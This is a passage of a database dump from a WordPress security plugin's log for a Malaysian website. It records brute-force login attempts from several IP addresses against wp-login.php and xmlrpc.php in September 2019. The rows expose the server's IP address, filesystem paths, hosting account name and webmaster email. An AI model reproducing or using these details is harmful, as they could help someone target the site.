21:17:13',18258640,19558320,'https://bintara.com.my/xmlrpc.php',1,0,'50.63.167.184'),(24276,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"37308\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-71mShanGhHYaqyCTKnwAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568668630.2577\";s:12:\"REQUEST_TIME\";s:10:\"1568668630\";}}','notice','2019-09-16 21:17:11','2019-09-16 21:17:10',17743176,19234640,'https://bintara.com.my/wp-login.php',1,0,'50.63.167.184'),(24275,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.22.250.194\";s:11:\"REMOTE_PORT\";s:5:\"52962\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-7smShanGhHYaqyCTKeQAAAAU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568668594.1531\";s:12:\"REQUEST_TIME\";s:10:\"1568668594\";}}','notice','2019-09-16 21:16:35','2019-09-16 21:16:34',18259024,19559096,'https://bintara.com.my/xmlrpc.php',1,0,'103.22.250.194'),(24273,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-16 21:14:10','2019-09-16 21:14:07',17717256,18180768,'https://bintara.com.my/about/',1,0,'66.249.71.30'),(24274,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.22.250.194\";s:11:\"REMOTE_PORT\";s:5:\"46866\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-7pGkPXSyJlCUJQmooeQAAAYE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568668580.4132\";s:12:\"REQUEST_TIME\";s:10:\"1568668580\";}}','notice','2019-09-16 21:16:21','2019-09-16 21:16:20',17742736,19234336,'https://bintara.com.my/wp-login.php',1,0,'103.22.250.194'),(24272,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"165.227.92.60\";s:11:\"REMOTE_PORT\";s:5:\"35434\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-5zWkPXSyJlCUJQmooFgAAAYU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568668109.6516\";s:12:\"REQUEST_TIME\";s:10:\"1568668109\";}}','notice','2019-09-16 21:08:31','2019-09-16 21:08:30',18258784,19558888,'https://bintara.com.my/xmlrpc.php',1,0,'165.227.92.60'),(24271,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"165.227.92.60\";s:11:\"REMOTE_PORT\";s:5:\"34532\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-5yGShanGhHYaqyCTIwwAAAAw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568668105.0726\";s:12:\"REQUEST_TIME\";s:10:\"1568668105\";}}','notice','2019-09-16 21:08:26','2019-09-16 21:08:25',17742688,19233376,'https://bintara.com.my/wp-login.php',1,0,'165.227.92.60'),(24270,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.133.15\";s:11:\"REMOTE_PORT\";s:5:\"58818\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-5HmkPXSyJlCUJQmon-wAAAYQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568667934.3283\";s:12:\"REQUEST_TIME\";s:10:\"1568667934\";}}','notice','2019-09-16 21:05:35','2019-09-16 21:05:34',18258640,19558320,'https://bintara.com.my/xmlrpc.php',1,0,'148.66.133.15'),(24269,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.133.15\";s:11:\"REMOTE_PORT\";s:5:\"58520\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-5HGShanGhHYaqyCTILQAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568667932.2508\";s:12:\"REQUEST_TIME\";s:10:\"1568667932\";}}','notice','2019-09-16 21:05:34','2019-09-16 21:05:32',17909248,19234640,'https://bintara.com.my/wp-login.php',1,0,'148.66.133.15'),(24268,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.133.15\";s:11:\"REMOTE_PORT\";s:5:\"58520\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-5HGShanGhHYaqyCTILQAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568667932.2508\";s:12:\"REQUEST_TIME\";s:10:\"1568667932\";}}','notice','2019-09-16 21:05:33','2019-09-16 21:05:32',17747704,19234640,'https://bintara.com.my/wp-login.php',1,0,'148.66.133.15'),(24267,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.254.18.110\";s:11:\"REMOTE_PORT\";s:5:\"48250\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-32GkPXSyJlCUJQmontAAAAYQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568667608.3546\";s:12:\"REQUEST_TIME\";s:10:\"1568667608\";}}','notice','2019-09-16 